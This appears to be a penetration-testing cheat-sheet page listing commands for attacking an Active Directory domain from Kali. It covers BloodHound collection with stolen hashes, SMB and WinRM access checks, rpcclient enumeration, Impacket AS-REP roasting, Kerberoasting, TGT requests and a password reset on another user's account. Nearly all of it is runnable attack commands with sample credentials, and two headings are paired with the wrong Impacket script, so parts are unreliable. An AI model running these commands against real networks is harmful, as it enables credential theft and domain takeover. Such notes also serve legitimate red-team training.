Domain Reconnaissance on Kali

BloodHound

proxychains bloodhound-python -c ALL -u kevin -p 'Passw0rd' -d red.com -dc dc.red.com -ns 10.9.20.10 --dns-tcp

or

proxychains bloodhound-python3 -c ALL -u 'WEB05$@RED.COM' --hashes 00000000000000000000000000000000:d66f37fd3d677522959e5b4aeecafb78 -d COMPLYEDGE.COM  -ns 172.16.76.168 --dns-tcp (Extract NTLM from /etc/krb5cc.keytab)

SMB Access

smbmap -H 10.9.20.10 -u kevin -p Passw0rd

WinRM Access

crackmapexec winrm 10.9.20.10 -u kevin -p 'Password'

SMB Signing

crackmapexec smb 10.9.20.10

User

  • RPCClient

proxychains rpcclient -U red.com/kevin.gustavo%Passw0rd 10.9.20.10

enumdomusers

queryuser 0x3601

  • Impacket

proxychains python3 GetADUsers.py -all -k -no-pass -dc-ip 10.9.20.10 red.com/Administrator

Group

  • RPCClient

enumdomgroups

querygroup 0x200

ASREPoasting

python3 impacket/example/GetUserSPNs.py red.com/ -no-pass -dc-ip 10.9.20.10 -userfile users.txt /fomat:hashcat

Kerberoasting

python3 impacket/example/GetNPUsers.py red.com/kevin:Passw0rd  -dc-ip 10.9.20.10

Overpass the Hash/PTK

python3 impacket/example/getTGT.py red.com/kevin:Passw0rd

Reset AD Password

  • RPCClient

setuserinfo2 lawrencecohen 23 'Passw0rd'
PreviousLateral MovementNextDomain Reconnaissance on Windows

Last updated